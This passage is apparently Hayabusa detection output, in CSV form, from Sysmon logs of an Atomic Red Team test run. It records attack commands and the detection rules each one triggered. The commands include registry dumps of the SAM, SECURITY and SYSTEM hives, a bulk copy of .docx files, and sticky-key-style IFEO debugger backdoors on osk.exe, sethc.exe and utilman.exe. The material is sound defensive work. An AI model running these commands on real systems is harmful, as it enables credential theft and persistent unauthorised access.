747F3D96-D87D-5D31-0000-001090723100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 747F3D96-D87D-5D31-0000-00107D793100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D87D-5D31-0000-0010057E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 747F3D96-D87D-5D31-0000-00101C873100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-D87D-5D31-0000-00104C8D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 747F3D96-D87D-5D31-0000-0010958F3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,../hayabusa-rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-D890-5D31-0000-001012383200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,../hayabusa-rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 747F3D96-D890-5D31-0000-0010A5383200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D890-5D31-0000-001085443200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 747F3D96-D89A-5D31-0000-0010F2703200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 747F3D96-D89F-5D31-0000-0010BC823200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | 